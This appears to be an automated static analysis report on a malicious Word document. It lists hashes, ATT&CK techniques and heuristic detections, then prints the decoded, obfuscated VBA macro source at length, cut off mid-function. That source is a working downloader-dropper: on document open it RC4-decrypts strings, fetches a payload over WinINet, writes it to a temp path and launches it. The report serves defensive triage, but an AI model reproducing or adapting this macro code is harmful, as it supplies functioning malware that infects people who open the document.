Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 c261b684267cdd4c…

MALICIOUS

Office (OOXML)

40.5 KB Created: 2015-06-24 11:31:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2015-09-30
MD5: 9ab32c9fd9fa4a82f17582b620ceac30 SHA-1: 9cd072d3de121707e5c8819b1f738bf9b640fb51 SHA-256: c261b684267cdd4c81bc8731ee53207cbbbc26d87f92ebbda2919a01c06a15e8
180 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is an OOXML document containing VBA macros, specifically a Document_Open macro, designed to execute malicious code. It employs a social engineering lure to prompt the user to enable editing and content, a common tactic for macro-based malware. The ClamAV detection signature 'Doc.Malware.Chronos-6897935-0' strongly indicates malicious intent, likely involving the download and execution of a second-stage payload.

Heuristics 7

  • ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    LYuEB = Environ(HYXG3fbPOc2O(Chr(130) + Chr(8) + Chr(90) + Chr(60) + Chr(50) + Chr(164) + Chr(130), "RNz80sPG9")) & "\" & PZpOxq2pZUwZ & HYXG3fbPOc2O(Chr(251) + Chr(25) + Chr(217) + Chr(156), "VJ2lcNm")
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 21793 bytes
SHA-256: bfbfc430ee30353d0960360a88510743ced418b0633a1185ffce92f24c5ba8bb
Detection
ClamAV: No threats found
Obfuscation or payload: likely
166 of 269 identifiers look randomly generated (e.g. 'MsmOZAQyd3oyr5EbT8nbQ0f') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Private Declare Function InternetOpenUrlA Lib "wininet" (ByVal JIJV6xn8NPiPj4 As Long, ByVal O7LtYk5AAQb7YlK As String, ByVal OplvpKs3mUe As String, ByVal BsLO As Long, ByVal VV0fNfDFFK1TEJwg2 As Long, ByVal RtRXQ As Long) As Long
Private THVLt2SqZJ20tJU As String
Private Declare Function CloseHandle Lib "kernel32" (ByVal EMGJWpLsg0LFd As Long) As Long
Private Type TjtYWQXrM9
   LmOxABarcJL5m As Long
   IY25Gycjz As Long
   YC6rBXy1FOA7eKD As Long
   T5UVzKazSt As Long
End Type
Private Type U6ECwjZSVYBjj1hf
   U7KMQ As Long
   SN0bg As String
   IGnEh6v20L1NYhvAt As String
   YSOPevDS4IHdausoU As String
   QlcATJlwV As Long
   CQRj5lgO9Oa As Long
   QZttlBVim0l7 As Long
   P1P As Long
   Gmv As Long
   KJvMc As Long
   QT27vcs As Long
   X9xUgqux As Long
   WxEQZ As Integer
   XLi1io As Integer
   EarcJL5mn8f As Long
   POoBf9lV7 As Long
   TnE2KDG58AZ5 As Long
   RjyhX1nDMf As Long
End Type
Private Declare Function CreateProcessA Lib "kernel32" (ByVal Url3f1KXyv8J11m As String, ByVal I8bKS2YR1 As String, JW2xQHpblwmsh5n As Any, Sxq9R1 As Any, ByVal YEfxKcx0aKJeweM As Long, ByVal Xw4ybCk1XLcmT8 As Long, GOYklrIM As Any, ByVal D8hjj7hyTijd As String, RTYYHvE As U6ECwjZSVYBjj1hf, FAJrz As TjtYWQXrM9) As Long
Private Type Mm8EZ1xGjr
   YpjK As Byte
   TRNy7MISLyyqY3el() As Byte
End Type
Private FC4HQ4wRyHoIIq(0 To 255) As Integer
Private Declare Sub XUcNdRhe2q Lib "msvbvm60" Alias "#183" (ByVal TDuFODy7qupN As Long, ByVal CeO1YB As Long, ByVal Xsr As Long)
Private Declare Function InternetOpenA Lib "wininet" (ByVal HB5jLqTe As String, ByVal HaH4GTyhX1nDMf As Long, ByVal DIddGWQ5Vug As String, ByVal QrNTFvLOiTgngz8ga As String, ByVal Kgl94EOWQKUQY As Long) As Long
Private Type C03eX6D6jmcn
   IkzFuKw4WZ As Integer
   EIM As Integer
   W5AbpVdDDKhK As Integer
   KEIMYcvA As Integer
   PJOKCvOyXVug As Long
End Type
Private Declare Function InternetReadFile Lib "wininet" (ByVal XScFnkFPFzRjnxs As Long, ByVal BLouzWeN0 As String, ByVal MzBn3uifMb2aD As Long, W8vkjbv As Long) As Integer
Private Declare Function InternetCloseHandle Lib "wininet" (ByRef RZPDsr2z As Long) As Long
Private Function Xcb(ByVal DuzWgGR As String, ByVal MFcropMWPb1b6 As String, ByVal WLwulc3H As String) As Boolean
Dim QTmLcIBRs9 As Long, JHBEZ As Long
QTmLcIBRs9 = 60
JHBEZ = 71
If QTmLcIBRs9 + JHBEZ > 4 Then
JHBEZ = QTmLcIBRs9 + 64
Else
MsgBox 86
End If
Dim JILOYJnAGr4K8O As Long, O7Mm050QaTM2CcM As Long, NpmoHfnTmW As Long, HsNN As String * 8162, VU23E As String, Bk1V7lHbS As Integer, XtF3wXKz42535d As Double
Dim WJ8tJdv2IcWchIB As Long, CsrkI2q0T6TFE As Long
WJ8tJdv2IcWchIB = 33
CsrkI2q0T6TFE = 51
If WJ8tJdv2IcWchIB + CsrkI2q0T6TFE > 4 Then
CsrkI2q0T6TFE = WJ8tJdv2IcWchIB + 96
Else
MsgBox 60
End If
JILOYJnAGr4K8O = InternetOpenA(HYXG3fbPOc2O(Chr(237) + Chr(200) + Chr(123) + Chr(116) + Chr(29) + Chr(108) + Chr(116) + Chr(72) + Chr(250) + Chr(118) + Chr(210) + Chr(11) + Chr(65) + Chr(67) + Chr(131) + Chr(250) + Chr(107) + Chr(160) + Chr(141) + Chr(149) + Chr(98) + Chr(173) + Chr(113) + Chr(202) + Chr(15) + Chr(255) + Chr(53) + Chr(227) + Chr(1) + Chr(127) + Chr(100) + Chr(103) + Chr(191) + Chr(253) + Chr(190) + Chr(230) + Chr(249) + Chr(104) + Chr(38) + Chr(197) + Chr(165) + Chr(160) + Chr(252) + Chr(144) + Chr(167) + Chr(166) + Chr(213) + Chr(26) + Chr(117) + Chr(170) + Chr(19) + Chr(7) + Chr(117) + Chr(64) + Chr(114) + Chr(10) + Chr(166) + Chr(223) + Chr(243) + Chr(99) + Chr(185) + Chr(149) + Chr(186) + Chr(127) + Chr(186) + Chr(103) + Chr(91), "BE1w0EVHRHz"), 1, vbNullString, vbNullString, 0)
Dim OX1c8S As Long, DAmqB1ZckienBTJ8 As Long
OX1c8S = 46
DAmqB1ZckienBTJ8 = 13
If OX1c8S + DAmqB1ZckienBTJ8 > 4 Then
DAmqB1ZckienBTJ8 = OX1c8S + 13
Else
MsgBox 87
End If
If JILOYJnAGr4K8O = 0 Then
Dim BQ7XD4orJvj As Long, O7trr8chhxo053x As Long
BQ7XD4orJvj = 48
O7trr8chhxo053x = 9
If BQ7XD4orJvj + O7trr8chhxo053x > 4 Then
O7trr8chhxo053x = BQ7XD4orJvj + 1
Else
MsgBox 97
End If
  Xcb = False
  Exit Function
End If
Dim RHtdcGye6iVYJj2 As Long, Xf5HIRW9M As Long
RHtdcGye6iVYJj2 = 28
Xf5HIRW9M = 18
If RHtdcGye6iVYJj2 + Xf5HIRW9M > 4 Then
Xf5HIRW9M = RHtdcGye6iVYJj2 + 74
Else
MsgBox 77
End If
O7Mm050QaTM2CcM = InternetOpenUrlA(JILOYJnAGr4K8O, DuzWgGR, vbNullString, 0, &H4000000, 0)
Dim UFB6Ne As Long, AoE32jk0xCX As Long
UFB6Ne = 52
AoE32jk0xCX = 68
If UFB6Ne + AoE32jk0xCX > 4 Then
AoE32jk0xCX = UFB6Ne + 48
Else
MsgBox 9
End If
If O7Mm050QaTM2CcM = 0 Then
Dim QpR1fVviNPnv As Long, AM7ZEYO3mtZiC As Long
QpR1fVviNPnv = 69
AM7ZEYO3mtZiC = 18
If QpR1fVviNPnv + AM7ZEYO3mtZiC > 4 Then
AM7ZEYO3mtZiC = QpR1fVviNPnv + 19
Else
MsgBox 70
End If
  XtF3wXKz42535d = 0
Else
Dim FglqNK1AL97j As Long, GuZTbLgBd As Long
FglqNK1AL97j = 29
GuZTbLgBd = 39
If FglqNK1AL97j + GuZTbLgBd > 4 Then
GuZTbLgBd = FglqNK1AL97j + 10
Else
MsgBox 96
End If
InternetReadFile O7Mm050QaTM2CcM, HsNN, 8162, NpmoHfnTmW
VU23E = HsNN
Dim WH7lSweGRUW6 As Long, TxvEKunWzCSsDre As Long
WH7lSweGRUW6 = 19
TxvEKunWzCSsDre = 15
If WH7lSweGRUW6 + TxvEKunWzCSsDre > 4 Then
TxvEKunWzCSsDre = WH7lSweGRUW6 + 80
Else
MsgBox 58
End If
Do While NpmoHfnTmW <> 0
  InternetReadFile O7Mm050QaTM2CcM, HsNN, 8162, NpmoHfnTmW
  VU23E = VU23E + Mid(HsNN, 1, NpmoHfnTmW)
Loop
XtF3wXKz42535d = Len(VU23E)
Dim Acqrhgcq0PH As Long, Pgt0u8Z6wBIx As Long
Acqrhgcq0PH = 51
Pgt0u8Z6wBIx = 71
If Acqrhgcq0PH + Pgt0u8Z6wBIx > 4 Then
Pgt0u8Z6wBIx = Acqrhgcq0PH + 12
Else
MsgBox 38
End If
Bk1V7lHbS = FreeFile
Dim LgpXdb5vC2ecCEEY As Long, QJ8bblSqZ51vaCU As Long
LgpXdb5vC2ecCEEY = 54
QJ8bblSqZ51vaCU = 64
If LgpXdb5vC2ecCEEY + QJ8bblSqZ51vaCU > 4 Then
QJ8bblSqZ51vaCU = LgpXdb5vC2ecCEEY + 9
Else
MsgBox 22
End If
Open MFcropMWPb1b6 For Binary Access Write Lock Write As #Bk1V7lHbS
Put #Bk1V7lHbS, , YpWNNNANc9vyNOr(HYXG3fbPOc2O(VU23E, WLwulc3H))
Dim OppJOjQsnQlcNm As Long, BhNGxECkNGFZ As Long
OppJOjQsnQlcNm = 97
BhNGxECkNGFZ = 10
If OppJOjQsnQlcNm + BhNGxECkNGFZ > 4 Then
BhNGxECkNGFZ = OppJOjQsnQlcNm + 46
Else
MsgBox 62
End If
Close #Bk1V7lHbS
End If
InternetCloseHandle O7Mm050QaTM2CcM
Dim AwfoQcKloLPC0 As Long, My5ODSIUtyF As Long
AwfoQcKloLPC0 = 78
My5ODSIUtyF = 39
If AwfoQcKloLPC0 + My5ODSIUtyF > 4 Then
My5ODSIUtyF = AwfoQcKloLPC0 + 56
Else
MsgBox 58
End If
InternetCloseHandle JILOYJnAGr4K8O
VU23E = ""
If XtF3wXKz42535d Then
  Xcb = True
Dim LgVQT2sDjxe As Long, JqvIicQZDO6tlYPpc As Long
LgVQT2sDjxe = 58
JqvIicQZDO6tlYPpc = 72
If LgVQT2sDjxe + JqvIicQZDO6tlYPpc > 4 Then
JqvIicQZDO6tlYPpc = LgVQT2sDjxe + 31
Else
MsgBox 82
End If
End If
Dim IGlLFl0cgvkwUw0W1 As Long, YSMWDaI3lJGk8ZxOA As Long
IGlLFl0cgvkwUw0W1 = 30
YSMWDaI3lJGk8ZxOA = 10
If IGlLFl0cgvkwUw0W1 + YSMWDaI3lJGk8ZxOA > 4 Then
YSMWDaI3lJGk8ZxOA = IGlLFl0cgvkwUw0W1 + 71
Else
MsgBox 62
End If
End Function
Private Sub Document_Open()
On Error Resume Next
Dim UXtvSFVvMTX2 As Long, PdcRb82H As Long
UXtvSFVvMTX2 = 28
PdcRb82H = 66
If UXtvSFVvMTX2 + PdcRb82H > 4 Then
PdcRb82H = UXtvSFVvMTX2 + 77
Else
MsgBox 92
End If
Dim LYuEB As String
Dim ImIcSJVm0QLVqHq5F As Long, Nr4HNFu4FAkFQY As Long
ImIcSJVm0QLVqHq5F = 98
Nr4HNFu4FAkFQY = 80
If ImIcSJVm0QLVqHq5F + Nr4HNFu4FAkFQY > 4 Then
Nr4HNFu4FAkFQY = ImIcSJVm0QLVqHq5F + 8
Else
MsgBox 27
End If
Dim DQDtwwDT3yE As Long, GeYlpAU5 As Long, KIrpoKqhrS3aC As Long, Jc8Su As Integer
Dim Q1OBInxK5pUydz As Long, Dynn6FoVyr4taBji As Long
Q1OBInxK5pUydz = 88
Dynn6FoVyr4taBji = 57
If Q1OBInxK5pUydz + Dynn6FoVyr4taBji > 4 Then
Dynn6FoVyr4taBji = Q1OBInxK5pUydz + 78
Else
MsgBox 89
End If
DQDtwwDT3yE = 987864617: GeYlpAU5 = 0: KIrpoKqhrS3aC = 0
Dim JqA8rQSPLFWCO As Long, IIWlVIVyUfDdw2Za7 As Long
JqA8rQSPLFWCO = 42
IIWlVIVyUfDdw2Za7 = 72
If JqA8rQSPLFWCO + IIWlVIVyUfDdw2Za7 > 4 Then
IIWlVIVyUfDdw2Za7 = JqA8rQSPLFWCO + 79
Else
MsgBox 85
End If
For GeYlpAU5 = 1 To DQDtwwDT3yE
KIrpoKqhrS3aC = KIrpoKqhrS3aC + 1
Next GeYlpAU5
Dim WpPRu1fBWJD As Long, H0vmKEIEmy0 As Long
WpPRu1fBWJD = 65
H0vmKEIEmy0 = 30
If WpPRu1fBWJD + H0vmKEIEmy0 > 4 Then
H0vmKEIEmy0 = WpPRu1fBWJD + 35
Else
MsgBox 74
End If
If KIrpoKqhrS3aC = DQDtwwDT3yE Then
Dim H67YAFmv21DW As Long, KK8JuuyJb39GggZ9 As Long
H67YAFmv21DW = 67
KK8JuuyJb39GggZ9 = 95
If H67YAFmv21DW + KK8JuuyJb39GggZ9 > 4 Then
KK8JuuyJb39GggZ9 = H67YAFmv21DW + 37
Else
MsgBox 40
End If
LYuEB = Environ(HYXG3fbPOc2O(Chr(130) + Chr(8) + Chr(90) + Chr(60) + Chr(50) + Chr(164) + Chr(130), "RNz80sPG9")) & "\" & PZpOxq2pZUwZ & HYXG3fbPOc2O(Chr(251) + Chr(25) + Chr(217) + Chr(156), "VJ2lcNm")
Dim Qho4jmhtBX1Nbw As Long, P8d8GyghT As Long
Qho4jmhtBX1Nbw = 26
P8d8GyghT = 75
If Qho4jmhtBX1Nbw + P8d8GyghT > 4 Then
P8d8GyghT = Qho4jmhtBX1Nbw + 26
Else
MsgBox 47
End If
If Xcb(HYXG3fbPOc2O(Chr(88) + Chr(165) + Chr(6) + Chr(251) + Chr(85) + Chr(0) + Chr(150) + Chr(64) + Chr(218) + Chr(199) + Chr(230) + Chr(1) + Chr(48) + Chr(18) + Chr(106) + Chr(254) + Chr(112) + Chr(100) + Chr(6) + Chr(96) + Chr(224) + Chr(135) + Chr(189) + Chr(189) + Chr(219) + Chr(206), "YNVrymt3PFtVmZWBJ"), LYuEB, HYXG3fbPOc2O(Chr(63) + Chr(186) + Chr(21) + Chr(31) + Chr(54) + Chr(135) + Chr(181) + Chr(86) + Chr(82), "VZpb1IiuAkFQY")) = True Then
Dim J2sSL2XhJen As Long, PxlU2jKepXZAkd As Long
J2sSL2XhJen = 92
PxlU2jKepXZAkd = 47
If J2sSL2XhJen + PxlU2jKepXZAkd > 4 Then
PxlU2jKepXZAkd = J2sSL2XhJen + 84
Else
MsgBox 45
End If
YX9eCOOad2w 1
Dim QV5lFC52 As Long, RdSzajAAOTYZA80FJ As Long
QV5lFC52 = 74
RdSzajAAOTYZA80FJ = 2
If QV5lFC52 + RdSzajAAOTYZA80FJ > 4 Then
RdSzajAAOTYZA80FJ = QV5lFC52 + 21
Else
MsgBox 88
End If
CiHR2Fphg LYuEB
Dim XB0Ndy7njDf As Long, AFnSl As Long
XB0Ndy7njDf = 8
AFnSl = 30
If XB0Ndy7njDf + AFnSl > 4 Then
AFnSl = XB0Ndy7njDf + 62
Else
MsgBox 64
End If
End If
Dim Hs4cQgW7C As Long, JCUef5o901j As Long
Hs4cQgW7C = 5
JCUef5o901j = 14
If Hs4cQgW7C + JCUef5o901j > 4 Then
JCUef5o901j = Hs4cQgW7C + 85
Else
MsgBox 71
End If
ActiveDocument.Range.Text = HYXG3fbPOc2O(Chr(211) + Chr(16) + Chr(104) + Chr(251) + Chr(33) + Chr(176) + Chr(159) + Chr(245) + Chr(238) + Chr(69) + Chr(128) + Chr(20) + Chr(201) + Chr(21) + Chr(7) + Chr(24) + Chr(130) + Chr(160) + Chr(12) + Chr(175) + Chr(196) + Chr(209) + Chr(249) + Chr(88) + Chr(62) + Chr(156) + Chr(147) + Chr(182) + Chr(64) + Chr(90) + Chr(138) + Chr(197) + Chr(68) + Chr(49) + Chr(60) + Chr(71) + Chr(117) + Chr(190) + Chr(57) + Chr(18) + Chr(241) + Chr(105) + Chr(160) + Chr(111) + Chr(26) + Chr(60) + Chr(251) + Chr(91) + Chr(64) + Chr(18) + Chr(114) + Chr(232) + Chr(10) + Chr(178) + Chr(225) + Chr(66) + Chr(29) + Chr(174) + Chr(155) + Chr(47) + Chr(39) + Chr(20) + Chr(174) + Chr(247) + Chr(122) + Chr(10) + Chr(115) + Chr(10) + Chr(178) + Chr(116) + Chr(188), "JQTXtgM8brIQEv")
End If
Dim Ufv5Pvt As Long, BKqinhzrFru154 As Long
Ufv5Pvt = 53
BKqinhzrFru154 = 67
If Ufv5Pvt + BKqinhzrFru154 > 4 Then
BKqinhzrFru154 = Ufv5Pvt + 70
Else
MsgBox 88
End If
End Sub
Private Function YpWNNNANc9vyNOr(H60MnvXAXee As String) As String
Dim Jzc8SR5kP9hu4s() As Byte
Jzc8SR5kP9hu4s() = StrConv(H60MnvXAXee, vbFromUnicode)
DUYzbBVT92Ze Jzc8SR5kP9hu4s, Len(H60MnvXAXee)
YpWNNNANc9vyNOr = StrConv(Jzc8SR5kP9hu4s(), vbUnicode)
End Function
Private Sub KCzBZWRiVFxy(LNiU38FhDVQpY() As C03eX6D6jmcn, GqG5KmIi7zpwvOLP As Long, MwMs As Long, IaJe0xY4Vxu7ZO3h As Mm8EZ1xGjr)
Dim FokJ As Integer, TROoTM As Long
TROoTM = 0
For FokJ = 0 To (IaJe0xY4Vxu7ZO3h.YpjK - 1)
If (IaJe0xY4Vxu7ZO3h.TRNy7MISLyyqY3el(FokJ) = 0) Then
If (LNiU38FhDVQpY(TROoTM).W5AbpVdDDKhK = -1) Then
LNiU38FhDVQpY(TROoTM).W5AbpVdDDKhK = GqG5KmIi7zpwvOLP
LNiU38FhDVQpY(GqG5KmIi7zpwvOLP).IkzFuKw4WZ = TROoTM
LNiU38FhDVQpY(GqG5KmIi7zpwvOLP).W5AbpVdDDKhK = -1
LNiU38FhDVQpY(GqG5KmIi7zpwvOLP).EIM = -1
LNiU38FhDVQpY(GqG5KmIi7zpwvOLP).KEIMYcvA = -1
GqG5KmIi7zpwvOLP = GqG5KmIi7zpwvOLP + 1
End If
TROoTM = LNiU38FhDVQpY(TROoTM).W5AbpVdDDKhK
ElseIf (IaJe0xY4Vxu7ZO3h.TRNy7MISLyyqY3el(FokJ) = 1) Then
If (LNiU38FhDVQpY(TROoTM).EIM = -1) Then
LNiU38FhDVQpY(TROoTM).EIM = GqG5KmIi7zpwvOLP
LNiU38FhDVQpY(GqG5KmIi7zpwvOLP).IkzFuKw4WZ = TROoTM
LNiU38FhDVQpY(GqG5KmIi7zpwvOLP).W5AbpVdDDKhK = -1
LNiU38FhDVQpY(GqG5KmIi7zpwvOLP).EIM = -1
LNiU38FhDVQpY(GqG5KmIi7zpwvOLP).KEIMYcvA = -1
GqG5KmIi7zpwvOLP = GqG5KmIi7zpwvOLP + 1
End If
TROoTM = LNiU38FhDVQpY(TROoTM).EIM
Else
Stop
End If
Next
LNiU38FhDVQpY(TROoTM).KEIMYcvA = MwMs
End Sub
Sub ConcE(Xp8nxrr() As Byte, Optional XeMiMDRnE As String)
Dim RNKBn As Long, WFArtC2Ug As Long, IZNLGEaUqnUA As Byte, LGqhydOE4g As Long, QF4po40ExD5h As Long, GQpJVqEQ9QfPjHdK As Long, Ck1qesWo7HS8s(0 To 255) As Integer
If (Len(XeMiMDRnE) > 0) Then Kg0Xeo = XeMiMDRnE
XUcNdRhe2q 512, VarPtr(Ck1qesWo7HS8s(0)), VarPtr(FC4HQ4wRyHoIIq(0))
QF4po40ExD5h = UBound(Xp8nxrr) + 1
GQpJVqEQ9QfPjHdK = QF4po40ExD5h
For LGqhydOE4g = 0 To (QF4po40ExD5h - 1)
RNKBn = (RNKBn + 1) Mod 256
WFArtC2Ug = (WFArtC2Ug + Ck1qesWo7HS8s(RNKBn)) Mod 256
IZNLGEaUqnUA = Ck1qesWo7HS8s(RNKBn)
Ck1qesWo7HS8s(RNKBn) = Ck1qesWo7HS8s(WFArtC2Ug)
Ck1qesWo7HS8s(WFArtC2Ug) = IZNLGEaUqnUA
Xp8nxrr(LGqhydOE4g) = Xp8nxrr(LGqhydOE4g) Xor (Ck1qesWo7HS8s((Ck1qesWo7HS8s(RNKBn) + Ck1qesWo7HS8s(WFArtC2Ug)) Mod 256))
Next
End Sub
Sub YX9eCOOad2w(Hw6q7F3qMp As Long)
Dim PkGjlVH As Long, IGVceb3Vhlfb As Long
PkGjlVH = 52
IGVceb3Vhlfb = 71
If PkGjlVH + IGVceb3Vhlfb > 4 Then
IGVceb3Vhlfb = PkGjlVH + 61
Else
MsgBox 18
End If
Dim JMMU9fdN As Long
Dim VxRM5f1N21Y As Long, JIMJutnBAEeWg As Long
VxRM5f1N21Y = 90
JIMJutnBAEeWg = 55
If VxRM5f1N21Y + JIMJutnBAEeWg > 4 Then
JIMJutnBAEeWg = VxRM5f1N21Y + 33
Else
MsgBox 73
End If
JMMU9fdN = Timer + Hw6q7F3qMp
Do While Timer < JMMU9fdN
DoEvents
Loop
Dim Xi4DvF6ZhaQV As Long, Xtr As Long
Xi4DvF6ZhaQV = 88
Xtr = 62
If Xi4DvF6ZhaQV + Xtr > 4 Then
Xtr = Xi4DvF6ZhaQV + 14
Else
MsgBox 57
End If
End Sub
Private Property Let Kg0Xeo(JEE9Y2vuxOQt As String)
Dim Y1r7L As Long, L47NT1aFND As Long, VnWFXRn9I As Byte, FmeO4T0() As Byte, L5y4jJrlLM As Long
If (THVLt2SqZJ20tJU = JEE9Y2vuxOQt) Then Exit Property
THVLt2SqZJ20tJU = JEE9Y2vuxOQt
FmeO4T0() = StrConv(THVLt2SqZJ20tJU, vbFromUnicode)
L5y4jJrlLM = Len(THVLt2SqZJ20tJU)
For Y1r7L = 0 To 255
FC4HQ4wRyHoIIq(Y1r7L) = Y1r7L
Next Y1r7L
For Y1r7L = 0 To 255
L47NT1aFND = (L47NT1aFND + FC4HQ4wRyHoIIq(Y1r7L) + FmeO4T0(Y1r7L Mod L5y4jJrlLM)) Mod 256
VnWFXRn9I = FC4HQ4wRyHoIIq(Y1r7L)
FC4HQ4wRyHoIIq(Y1r7L) = FC4HQ4wRyHoIIq(L47NT1aFND)
FC4HQ4wRyHoIIq(L47NT1aFND) = VnWFXRn9I
Next
End Property
Function HYXG3fbPOc2O(Fg7ryETvYXeo As String, J0VhEjfRT9 As String) As String
Dim QrQH3rSLPdY As Long, L8FYqsZwHe As Long
QrQH3rSLPdY = 75
L8FYqsZwHe = 1
If QrQH3rSLPdY + L8FYqsZwHe > 4 Then
L8FYqsZwHe = QrQH3rSLPdY + 98
Else
MsgBox 30
End If
Dim byteArray() As Byte
byteArray() = StrConv(Fg7ryETvYXeo, vbFromUnicode)
ConcE byteArray(), J0VhEjfRT9
HYXG3fbPOc2O = StrConv(byteArray(), vbUnicode)
Dim A11W28rnz As Long, XtGxJXLtRdIa0G As Long
A11W28rnz = 30
XtGxJXLtRdIa0G = 82
If A11W28rnz + XtGxJXLtRdIa0G > 4 Then
XtGxJXLtRdIa0G = A11W28rnz + 26
Else
MsgBox 50
End If
End Function
Private Function PZpOxq2pZUwZ(Optional L8EdTIUgm1W As String = "0123456789") As String
Dim Ob4HJwjYCzviB8 As Long, Jnt4Vi3mG4 As Long
Ob4HJwjYCzviB8 = 18
Jnt4Vi3mG4 = 47
If Ob4HJwjYCzviB8 + Jnt4Vi3mG4 > 4 Then
Jnt4Vi3mG4 = Ob4HJwjYCzviB8 + 61
Else
MsgBox 64
End If
Dim UDSZU3i2() As Byte, PVoPyKfg2CeRov() As Byte, BKpnRWgGR As Long, EoeWuBph992 As Long, QrPMgHGn9DT As Long, TTQhi8 As String
Dim WpdH4PjktGNK As Long, UFTKbzyd3oyr5 As Long
WpdH4PjktGNK = 76
UFTKbzyd3oyr5 = 71
If WpdH4PjktGNK + UFTKbzyd3oyr5 > 4 Then
UFTKbzyd3oyr5 = WpdH4PjktGNK + 60
Else
MsgBox 95
End If
QrPMgHGn9DT = 0
Dim RB05v6eGQsxz As Long, MsmOZAQyd3oyr5EbT8nbQ0f As Long
RB05v6eGQsxz = 42
MsmOZAQyd3oyr5EbT8nbQ0f = 74
If RB05v6eGQsxz + MsmOZAQyd3oyr5EbT8nbQ0f > 4 Then
MsmOZAQyd3oyr5EbT8nbQ0f = RB05v6eGQsxz + 26
Else
MsgBox 24
End If
BMaDgeIOCl6Fl:
Dim PWkC As Long, RlPAL7q07zu0 As Long
PWkC = 15
RlPAL7q07zu0 = 32
If PWkC + RlPAL7q07zu0 > 4 Then
RlPAL7q07zu0 = PWkC + 33
Else
MsgBox 30
End If
Randomize
TTQhi8 = Int(30 * Rnd)
If TTQhi8 < 4 Then GoTo BMaDgeIOCl6Fl
QrPMgHGn9DT = TTQhi8
If QrPMgHGn9DT > 0& Then
Dim SDrmBO9cfMB As Long, SfJN99fDaKZNXk As Long
SDrmBO9cfMB = 45
SfJN99fDaKZNXk = 40
If SDrmBO9cfMB + SfJN99fDaKZNXk > 4 Then
SfJN99fDaKZNXk = SDrmBO9cfMB + 28
Else
MsgBox 63
End If
Randomize
UDSZU3i2 = L8EdTIUgm1W
Dim HMlZh355Ye6v As Long, Gud5paYh As Long
HMlZh355Ye6v = 31
Gud5paYh = 81
If HMlZh355Ye6v + Gud5paYh > 4 Then
Gud5paYh = HMlZh355Ye6v + 4
Else
MsgBox 91
End If
BKpnRWgGR = Len(L8EdTIUgm1W) - 1&
QrPMgHGn9DT = (QrPMgHGn9DT * 2&) - 1&
Dim Uzk2Nd As Long, BYo0HoUZtRc As Long
Uzk2Nd = 66
BYo0HoUZtRc = 76
If Uzk2Nd + BYo0HoUZtRc > 4 Then
BYo0HoUZtRc = Uzk2Nd + 47
Else
MsgBox 34
End If
ReDim PVoPyKfg2CeRov(QrPMgHGn9DT) As Byte
For EoeWuBph992 = 0& To QrPMgHGn9DT Step 2&
PVoPyKfg2CeRov(EoeWuBph992) = UDSZU3i2(CLng(BKpnRWgGR * Rnd) * 2&)
Next
Dim KsQyMzzoaPai As Long, TNk9jK As Long
KsQyMzzoaPai = 31
TNk9jK = 11
If KsQyMzzoaPai + TNk9jK > 4 Then
TNk9jK = KsQyMzzoaPai + 71
Else
MsgBox 62
End If
End If
Dim NLkoV As Long, NjAuYGcNLpzdT6 As Long
NLkoV = 8
NjAuYGcNLpzdT6 = 26
If NLkoV + NjAuYGcNLpzdT6 > 4 Then
NjAuYGcNLpzdT6 = NLkoV + 27
Else
MsgBox 24
End If
PZpOxq2pZUwZ = PVoPyKfg2CeRov
Dim EeH55k9jK As Long, LRcwr3 As Long
EeH55k9jK = 23
LRcwr3 = 54
If EeH55k9jK + LRcwr3 > 4 Then
LRcwr3 = EeH55k9jK + 61
Else
MsgBox 66
End If
End Function
Private Function CiHR2Fphg(HIDF16c53h1 As String)
Dim HiQCbrl1a As Long, TP5Ww2SzCBqdLh As Long
HiQCbrl1a = 29
TP5Ww2SzCBqdLh = 62
If HiQCbrl1a + TP5Ww2SzCBqdLh > 4 Then
TP5Ww2SzCBqdLh = HiQCbrl1a + 36
Else
MsgBox 43
End If
